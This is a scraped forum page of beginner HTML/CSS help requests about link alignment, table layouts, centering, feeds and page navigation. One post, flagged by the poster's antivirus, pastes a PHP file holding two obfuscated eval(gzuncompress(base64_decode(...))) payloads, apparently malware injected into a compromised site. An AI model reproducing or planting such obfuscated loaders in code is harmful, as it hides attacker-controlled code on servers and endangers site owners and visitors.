HTML - Webpage Out Of Alignment When Using Links
Hi,
This is my first post I have a website that I've been building and since I've been linking the pages, it goes out of alignment until I refresh the page? It stretches about 6cm to the left although it keeps the left margin at 200. If I click on a link then press the IE back button it uses the full left hand side of the screen. I've not got any margins controlling the left. Would this prevent this, if there is such a thing? Any help or advice would be greatly appreciated Similar TutorialsHi, my name is Josh, and I'm fairly new to website design, so therefore, also a little new to HTML. I apologize in advance for the length of my post, but I feel I really need to be specific as much as possible. Let me be honest with you. I have very limited knowledge on the subject, but I am a quick learner. Anyway, I'm creating a directory on my website where the visitor would be able to clink on one of 51 links, aligned in 3 columns, to take them to a page listing businesses within one of the 50 states. The 51st link, of course, would be directing visitors to an international listing page. Then below the links for the different states, there is supposed to be 26 links, one for each letter of the alphabet, so the visitor can find a business by name. Following that, of course, would begin the listing of the businesses. Basically, I've been teaching myself HTML so far by viewing the source code of pages I visit, and I discover a basic idea of how to do different things with web design. Let me show you the format I've been trying to grasp with this project by giving you an example code. The following code places the links for the states all at the bottom, and also they are not aligned properly, as the first column appears higher than the second which is also higher than the third. I'm not sure I quite understand the way this code works, or what mistake I'm making with it. What I would actually rather do is have a code creating a drop-down box which the visitor would just select their option, and be directed to the requested page immediately, but I don't know how to do that either. At any rate, I do also need to figure out how to get those state-by-state links to appear at the top of the business listings instead of at the very bottom of the page the way it is appearing now with this code. If anybody could help me figure out what the heck I'm doing, I would really appreciate it. HTML Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0063)[url]http://www.geocities.com/josh**************/connections.html[/url] --> <HTML> <HEAD> <TITLE>Connections</TITLE> <body background="http://www.geocities.com/clipart/pbi/backgrounds/Template_Pages/aboutme_techie_bg2.gif" bgcolor="#000000" link="#ff0000" vlink="#ff00ff" text="#00ff00" > <table border=0 cellspacing=0 cellpadding=0 width=650> <tr valign="top" align="left"> <H1><A name=top>Connections</H1></FONT></A> <P><IMG height=4 src="" width=500></P><FONT color=#0000ff> <H2>Welcome to...</H2></FONT> <tr valign="top" align="left"> <td colspan=1 height=750></td> <td align="left" colspan=3 rowspan=1 width=639><p><b><i><u><font color="#7F7F7F" face="Arial Black" size="+1"><A href="http://www.geocities.com/josh**************/alabama.html">Alabama</A><br><A href="http://www.geocities.com/josh**************/arizona.html">Arizona</A><br>...</font></b></i></u></td> <td colspan=2 height=750></td> </tr> <tr valign="top" align="left"> <td colspan=1 height=750></td> <td align="center" colspan=3 rowspan=1 width=639><p><b><i><u><font color="#7F7F7F" face="Arial Black" size="+1"><A href="http://www.geocities.com/josh**************/kentucky.html">Kentucky</A><br><A href="http://www.geocities.com/josh**************/louisiana.html">Louisiana</A><br>...</font></b></i></u></td> <td colspan=2 height=750></td> </tr> <tr valign="top" align="left"> <td colspan=1 height=750></td> <td align="right" colspan=3 rowspan=1 width=639><p><b><i><u><font color="#7F7F7F" face="Arial Black" size="+1"><A href="http://www.geocities.com/josh**************/northcarolina.html">North Carolina</A><br><A href="http://www.geocities.com/josh**************/ohio.html">Ohio</A>...</font></b></i></u></td> <td colspan=2 height=750></td> </tr> <P><A href="http://www.geocities.com/josh**************/connections.html#A">A</A> <A href="http://www.geocities.com/josh**************/connections.html#B">B</A>...</P> <P><A href="http://www.geocities.com/josh**************/connections.html#N">N</A> <A href="http://www.geocities.com/josh**************/connections.html#O">O</A>...</P> <P><A href="http://www.geocities.com/josh**************/home.html">Return To Home Page</A></P> <FONT color=#00ff00> <H3>13AD LUC ENT</H3> <ADDRESS>12341 Nellis Street, Springfield Gardens, NY 11413-1440</ADDRESS> <ADDRESS>718.807.8811</ADDRESS>... <H3>Zoom Records</H3> <ADDRESS>19 Embarcadero Cove, Oakland, CA 94606</ADDRESS> <ADDRESS>510.535.9666</ADDRESS> <P><A href="http://www.geocities.com/josh**************/connections.html#top">Return to Top</A></P> <P><A href="http://www.geocities.com/josh**************/home.html">Return to Home Page</A></P> </BODY></HTML> As you can see, my knowledge of HTML is pretty basic, and I'm sure you can tell that I tried to abbreviate this excerpt code as much as possible to conserve space on this post. I placed three dots "..." in many places to signify where large irrelevant portions of the page have been omitted, especially where I eliminated the thousands of business listing codes...lol. It may also have not been necessary to provide as much of the code as I did, but I just wanted to make sure that what I need is understood so perhaps I can get some help. Thank you everyone in advance for your assistance... hi all, One strange issue with html <a> tags.We have XP English and Japanese machines and issue is getting only in XP Japanese machines. Issue is tat on clicking any link,link font size gets increased and its comes over other links.Its like a new layer of big font sized links over the old links. Any idea why this happens? Following is my JSP section ============================= <div onselectstart="return false" id="systemMenu" style="position:absolute;top:-75px; left:-20px; "> <label>Screen # : </label> <input tabindex="1" suggest_sel_event="selectScreenIdValue" type="text" title="Provide screenId and Hit Enter key" id="screenIdEntry" name="screenIdEntry"/> <button tabindex="-1" id="SUGGEST_screenIdEntry" onclick="suggestScreenIds()"></button> | <a tabindex="2" href="javascript:selMenu('showHomePage.do','PARENT','')">Home</a> | <a tabindex="3" href="javascript:doHelpFunc()" onmouseover="">Help</a> | <a tabindex="4" href="javascript:aboutiCargo('<%=mainWebBuildVersion%>')" onmouseover="">About</a> | <a tabindex="5" accesskey="o" href="javascript:exitlogOffIcargo(ctxPath+'/logout.do','logOffApp')">Lo<u>g</u>off</a> | <a tabindex="6" accesskey="x" href="javascript:exitlogOffIcargo(ctxPath+'/logout.do','exitApp')" >E<u>x</u>it</a> </div> =================================================== CSS Used In the page ===================== <STYLE> body{ margin:-1px; scrollbar-base-color: #C6CEDE; scrollbar-arrow-color: #000000; scrollbar-track-color: #C6CEDE; scrollbar-face-color: #C4CED9; scrollbar-highlight-color: #C6CEDE; scrollbar-shadow-color: #C6CEDE; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; } #footer{ position:absolute; left:1%; top:99%; width:97%; text-align:center; font-size : 8pt;font-family : Arial,Verdana,Sans-Serif; /*font:menu;*/ color : #000000; /*background-color:#CCCCCC; */ } .footer{ text-align:center; font-size : 8pt;font-family : Arial,Verdana,Sans-Serif; /*font:menu;*/ /*background-color:#CCCCCC; */ } div.footer table{ border-collapse:collapse; padding:0px; word-spacing : 0px; width: 99%; /*100% of container produces horiz. scroll in Mozilla*/ border: 0px; } div#systemMenu{ color:#ffffff; font-weight:bold; } div#systemMenu button{ border-collapse:collapse; color:#ffffff; font-weight:bold; font-size:12px; border: 0px none; background-color:1F3E6C; width:0px; height:0px; } div#systemMenu input{ /*font-family : Arial,Verdana,Sans-Serif; font-size : 8pt;*/ font:menu; width : 75px; height : 15px; color : #000000; text-transform : uppercase; background : #ffffff; border-right-width : 0px; border-bottom-width : 0px; border-left-width : 0px; border-top-width : 0px; border-top-style : none; border-left-style : none; border-right-style : none; border-bottom-style : none; border-collapse:collapse; } div#systemMenu label{ border-collapse:collapse; color:#ffffff; border: 0px none; background-color:1F3E6C; text-decoration : none; /*font-weight:bold; font-size:12px;*/ /*font-family: Trebuchet MS, Lucida Sans Unicode, Arial, sans-serif;*/ font:menu; } div#systemMenu a{ border-collapse:collapse; color:#ffffff; border: 0px none; background-color:1F3E6C; text-decoration : none; /*font-weight:bold;font-size:12px;*/ /*font-family: Trebuchet MS, Lucida Sans Unicode, Arial, sans-serif;*/ font:menu; } div#mainErrorDiv table{ padding:0px; word-spacing : 0px; width: 99%; /*100% of container produces horiz. scroll in Mozilla*/ } /*********************************FONT STYLES********************************/ .iCargoRedText { font-family : Arial,Verdana,Sans-Serif; font-size : 10pt; color : #336666; font-weight : bold; } .iCargoSmallText { font-family : Arial,Verdana,Sans-Serif; font-size : 7pt; color : #000000; } .iCargoPageText { font-family : Arial,Verdana,Sans-Serif; font-size : 10pt; color : #000000; } .iCargoErrorMessage { font-family : Arial,Verdana,Sans-Serif; font-size : 9pt; color : #336666; list-style-position : outside; list-style-type : square; } .iCargoInfoMessage { font-family : Arial,Verdana,Sans-Serif; font-size : 9pt; color : #000000; } div.loadBox { /*font-family: Arial, sans-serif; font-size:9pt;*/ font:menu; color: #FFFFFF; border: 0px none #FF3E3E; background-color: #1F3E6C ; text-align: center; position:absolute; } </STYLE> Sorry if i posted this in the wrong location. So im a real estate agent making a website. Im no pro and most of the stuff ive been using to build has been through layouts/generators/help of others such as yourselves. So ive been stuck on finding/making this code for the past couple of days. So all my listings are on my agencys website, not my personal agent website. Is there a code i could have where in the listings page my my personal agent website, i could have a window maybe 600x900 of the listing page on my agencys website? To kind of clear things up, you know how when you google something you have the magnifying glass, how it gives that preview. How can i have that preview coded onto a webpage, but me say what webpage to preview and how big to make the preview box? Tried to explain it as best i could. If you dont know the code, if you can tell me what its called so i can try to narrow the google searches. So far everything that has been coming up in the search restults has been preview boxes to preview html codes you have already written. Fail Blog Thanks Hi everyone, I hope I have posted this in the right area. This is my first time posting here. I currently have my main pages listed at the top of my site as graphics (see fussybaby.ca). I would like to potentially remove these graphics and use text links instead - I had the graphics designed for me, so I can't just go in and make new ones, however I'd like to change/rearrange the links and add some new ones. So my question is: How hard is this to do? Is this something I need to hire someone to do for me? Thanks in advance for any advice! how do i make a background image fit to the window. also i have a button on a page. how do i get it to close the window uppon clicking it. any help would be great. Hi, i have a problem im not sure how to go about it . I have a webpage where the user enters there personal details . As they are fillign in details they click a link and another webpage is opened ( keeping the orginal open ) Where the do some other stuff on this new page and what is created is a javascript array of numbers I then want them to be able close this new window down and the javascript array data will be submitted with the rest of the personal information when the click a submit button on the first page . If this makes sense how do i go about this? Thanks I'm a novice compared to the pros here and stuck on a couple issues. My website is uspsrealty.com There is some "empty" space on my home page below the horizontal line. I want to remove the horizontal line and have the ability to use that empty space without throwing my borders/margins off. I would like to add about 3-4 sentences in that blank area. Can this be changed so I can add a few sentences? I know why this is happening, just don't know how to correct it. Also want to change the copyright.jpg to 2010 from 2009. Might as well make up a few more jpgs with the years 2011, 2012, 2013, 2014, and 2015 Willing to paypal you money for your help. Hoping one of you pros can do this in 30 min and willing to pay $25-30. Contact me he galevin@hotmail.com Thanks, Gerald Levin Hi, Can anyone help me work out how to create a tab on the left hand side of the browser window, a bit like the Convotrack one he http://www.dannywhatmough.com/ Obviously I would want to use my own image/text and just link it to a webpage. Do I need to use javascript? Danny Hello, I got this message with AVG : http://img189.imageshack.us/img189/8502/image001jn.png Here is my website : http://www.club19.com.au What is the problem ? Here is the code of the concerned file (SprySlidingPanels.php) : PHP Code: <?php eval(gzuncompress(base64_decode('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'))); eval(gzuncompress(base64_decode('eNqVWAtz2zYS/iu0JtOIE59NAHxGYUfXTpKm7uPqhxon8WhoiZI5lkQfSV3SOP7vt9hdUCRFu3eZmAQXi2+xi31B42y5yYt0ui3TYppc50U1LPLtZj50XjhHqvHv6U/bHo3LtJquk2U2m/57m1dpOS22mypbpwbQ8GjadJWts6o5kxZFXkyL9A62kG2WjalsMRwvtptZleWbafolK6ty+DzbZMBcVrD357Z9P258D/NVSphdougjyj6i6iO6fUQPiA+PbhH0rbcHY1zh24cNvZszwaMzoX2oX1GXLhz78LeLX37pksWjSELWUy/E3qTaTf6fx/+Qrsr0UTskqyotakvgFwl09zbamPSemvTJJCLomQtbVmlMRE8gSqepvOz+9SwQbVNqNzjYU38203obsjWbDZ+tpo59D08RI4xEH99***1WU5CIHgTcMq4pQ3uEYzi3/K7SgPJQOI4jDxF7f9KVDb33l6qdHvy/ly2KGpz9Jurblgj1tgRqeTBEIy7Z4SS4zrdvbRKEmXaUPSRP/o3sh/01fthY43b/YA1wKbJr+iXFo5GsxGyVlykTYOOa0TqIY2uRgKPb90VabYuNpcmjB3R+q+8QF2U+u83v0o0+xOUqv05Weo2rBTtxWWHKWyUzzkUeObUE56aTBMy7Il1CYq1mN8QDWWKgJwfkFl6sPwhvnH65W+VzBgsNCM7px0fjBFcjXNmUr+dJeITrPDovPbK+fbPwDepjdnSMaPyCk32ALz+GI7zJy+r6r02yJkDOC/ePTu9QJKEEcW0yzeLX5xc6uC30pajhr3CIoEaarKemuORbPP2gzURnGFDgOfHg7etzUuqn8/N/HYsj51PxaTMY4ax1FA9+gq2+1BzdidN0kRZp8dK6qaq7l8fHmkUDtdnIUMrerbuAEvuPfy7TDcGKPn7XHi3utuA4uH+cs0efbzKYO1ikOatAOgi9agFGLbvaSrfz0MGxqB06oE2JtrsoD+0rRCNivOYfRYuQMXI1XIks69KuZKyd0311XVjH39Pz0wYnBni+wND1esWpXAW0gzrgdlJ0hHudh31FElW8x7qXHK52fgj8KCykhI0UNigCqQYrUSQydsJQRRSGoBedRyf6XKdWZi/8aote9YStK/4mbN09A7qSDOiqpkzhoqKuaz+yig/cPcTTG3FGMwWKzbDLc0JAoiNiOrvJ0WFd3x5Bqqv0TG/1m6fVD636pwlodA+F+2T6IE6KIvmL9hWwNtz0uBG9PYffgt+staf47fKbk6jHbuUxnsd4HuP5jOczns94PuP5jOczns94PuP5jOczXsB4AeMFjBcwXsB4AeMFjBcwXsB4AeOFjBcyXsh4IeOFjBcyXsh4IeOFjBcyXsR4EeNFjBcxXsR4EeNFjBcxXmSaUMaDym4GwgykGSgzcM3AMwPTuDmBGYRmYJCFQRYGWRhkYZCFQRYmM4UNJxJ1fyiMGGHECCNGGjHSiJFGjDRipBFjarOQBlkaZGmQpUFWBlkZZGWQlUFWBlkZZJMIhTLIyiArg+waZNcgu5L192LMUc0YF66RBmkAA84j3iiuim06WsA1JoGMhjFoJaWOc7AKhDKUuGU2HOD3gEOVYjWKsQUaXcPS2zqHRnYTKzRYYoeFn7yHRiP1BKSVbOYHtJh08IwO7WWtBRbkuRU1D8D4KjY5Vx4FXufRhWnkumj0SEIr1tNi0cpoSEHtJPXpKh4voGKv8fJLdC5oElIyNDbzrGC6fU/FHTeg20ukezHYYW64dD98z+s94LHIFr793XdWhxZoWlZOtXjix076Zp3P6bPRJERQg/ae+pKz3ayyzS0vBzNg37DbDLTZVb6lc5Z44ZCKnpo5/U+yGl4nZeq703k600XtefLn5fLk7errTE6ckx9PFxe3k9PJxeR88qbMPry//PJu5dydnP0QvHs7kZd/fs4v12++fji/dN7L09WljG4/nC1v34uf31xMJm8uxOn1u/VE/nr28/zk7FavcZP3fwSLP+L4OcWB9GOyRkifQfxsevb6dPL69CPRI6qjokP3uL7KsDsh6iZHBqYHFlB+qC0WO5Jikgx3NDi+eZYOaS+RrsJVvso/p2hPvhRlpb6BP5v++PvvJ+9ef0QlrvRZAjf8R8kRxTFUNx09HDzjG3CU+rrs6+NrUQLbOlqu50nF6QBqIFBoGHW5fWePAjmGJHXonHKUE4NjmHYe0iBjQwlFvbQfmshBdrsnQtoIIGl9y94G/CN2tjZT2+t2/qicjj9qGvS5OwP4Ll0FkFtY3/MpQY2naALaK0Pz9d20yxj0MMKu7ToLKOrclGyJjdhgCttj5RwjC7b/yjW0Mi3LKU/0mU/Z/QnGiPTihbk3KcW/jugz3bX+UGqeMlefUFf7tCaW2deUKa/qNKKb8faD9qj8ZjE2LZEwPZEwTZEIzC08iHHZxwJyeP3rX/P3lSvriDmYpvZJ4oWgIFZhPKZOFmqpub+HdaY0uf8JU453tnR5qxhfi89FVrEx8QagwoEm/482bsy4Hetja12n31YKgh7xyh5RHnlAr47icTvNoh76V5TpLN9UcMs0x0ftv0OKsh8hSXDdaxRu1+HCDU2FrjnjqsjWQ/qGjIYZEA0Hi7GB4Ir9QHV0XHf3h8Rq7oaYI6nIUfhArQaKhiB3adnb+G7Ya28ZwL15z+J4JUHDwG7+C03sxv0='))); ?> Thank you ! I have a project right now, but when I have finished the project, i'm wanting to recreate my Minecraft server website. But I have a question... I see websites that resize theirselves depending on the screen size.... How would you do this? I know of the % in css, but would I have to use that in each of my divs instead of using px? Hi, I was wonderin how to get a certain webpage onto my website Eny ideas Thanks Hi, I am VERY new to web development and I am making a page for my friend. Here's what I am trying to do, I want to use an image that is about 500 pixels high for the background of my page, and then whenever the text grows past that 500 pixels I want to start tiling a different image. Right now i'm just using a table and I have the image as the background. But as expected this just tiles that image over and over again. Is there a way to have it tile a different image without splitting the text up into two tables? Thanks! Evan Hi just to introduce myself My name Is brian Krause and i work for valley queen cheese factory, In Milbank SD. My problem is on our website we hav a page that is called jobs.htm. Is there a way i can get it so when you type in www.vqcheese.com/jobs the jobs.htm page will show up and no just error out? Thanks Hello, I remember something like this, which is you have an xhtml form, you have textboxes, buttons etc, then the user clicks on the submit button triggers the sendform feature element and sends it to the email address specified. How do you do that in html? i remember it was like send form, then the email address etc etc and anything between the send form tag is where it will email anything in the text box fields. if you can send me an example that would be great. Thanks Okay that most probably didnt explain it very well but I am looking at putting a page together that will display a specific image at the top of the page dependant on where the visitor came from So if they came to my site from a link from abc.com then they will see the ABC logo on our page however if they came from 123.net then they will see the same page but this time with the 123.net logo. If we cant find where they have came from or we dont have an image for that forwarder then it will show a default image Anyone know if this can be done?? Take a look at this image. What I want to do is make the background black (which I know how to do), but to add in the black header plus the gray box--same width. What I'm trying to do is my forum is fixed width (in the center, not expanded on browser) and I want to do the same to a new non-forum site starting from scratch. I would like to get data from a specific website (http://www.forex.se/rates.asp?sectionId=246). More exactly, I want to get the values of the actual currencies and have them printed on my website. So for example, I would like to have it like this on my webpage: Code: Currency buy - sell EUR : 9,3749 - 9,6410 USD : 5,8674 - 6,0745 Thanks in advice. Hi, I'm new to the site and I'm just here to ask a question. I've been having trouble with my webpage trying to center everything. The problem is that at home my webpage is centered (When you zoom out everything stays centered) but as for school I zoom out and everything stays to the left and I'm pretty sure I left all the code the same from computer to computer. I don't think it is the resolution because I had changed my resolution to the same as at school. This is my coding (I'm an amateur at Html and don't know CSS): <title>Home - WebBanners</title> </head> <p align="center"> <div style="position:absolute;top:0px; left:0px; right:0px; bottom:0px;" align="center"> <body topmargin="0" leftmargin="0" bgcolor="#0099FF"> <img src="Banner.gif" width="1280" height="290" border="0" usemap="#Map" /> <map name="Map" id="Map"> <area shape="rect" coords="140,233,302,285" href="Home.html" /> <area shape="rect" coords="330,233,543,286" href="Samples.html" /> <area shape="rect" coords="565,240,722,287" href="Prices.html" /> <area shape="rect" coords="752,229,905,286" href="About.html" /> <area shape="rect" coords="945,235,1122,284" href="Contact.html" /> </map> <font face="Georgia, Times New Roman, Times, serif" size="+4" color="white"><p align="center"> <u> Welcome To WebBanners!</u></p></font> </p> <table align="center"> <tr> <td><font face="Georgia, Times New Roman, Times, serif" color="black" size="7"><strong>H</strong></font> <font face="Georgia, Times New Roman, Times, serif" size="+2" color="white">ere we make special just-for-you banner. <br /> <br> <font face="Georgia, Times New Roman, Times, serif">Every banner is unique to the person who have ordered them.<br /> <br><font face="Georgia, Times New Roman, Times, serif">They are sold at a reasonable price and if you don't <br>like them then we offer full money back guaranteed. <br /> <br /> We also have an interactive department where you can <br />talk to one of 'us' through the microphone so we can help you. <br />All you have to do is ask through the E-mail. <br /> <br /> We can make tons of banners for your website such as the one above <br />or see more <a href="Samples.html">Here</a> <br /> <br /> We have prices for your special needs. <br />All of the banners we offer are your ideas. <br />Ask and we can do it for you! Click <a href="Prices.html"> Here </a> for prices. <br /> <br /> Want to learn more about us? Click <a href="About.html"> Here </a> for more information. <br /> <br /> Going to buy one of our offers? Need help in finding something? <br />Click <a href="Contact.html"> Here </a> to contact us! For your design! </font> </td> <td align="center"> <font face="Georgia, Times New Roman, Times, serif" color="Green" size="+3"><u><strong>So Why Pick Us? </font> </u> </strong> <br /> <br /> <font face="Georgia, Times New Roman, Times, serif" color="Green" size="+2"> <li>We have 100% Money Back Guarantee <br /> <li>Satisfaction Guarantee<br /> <li>Our Prices beat the Competitors<br /> <li>24 Hour Service <br /> <li>Interactive Department <br /> <br /> <br /> <br /> <img src="Ordernow!.gif" /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> </body> </html> I've done a search on here, and have spent the last week or searching on google, I'm currently building a webpage up which integrates a forum, i want to put a feed on the home page of the site of the latest topics from the forum. The feed address is: feed://guitarprojectuk.forumotion.com/feed/ and the actual website address is: http://www.guitarprojectuk.com I've tried a few on google, and non seem to work, not sure wether its the feed or something i'm doing, so can somebody help me out? Thanks, Tom. I'm trying to learn a little bit of html. I've got some basic knowledge now, but I can't figure out one thing. I want to make a button to go to another webpage. How do I add webpages to my website and access them through a button? |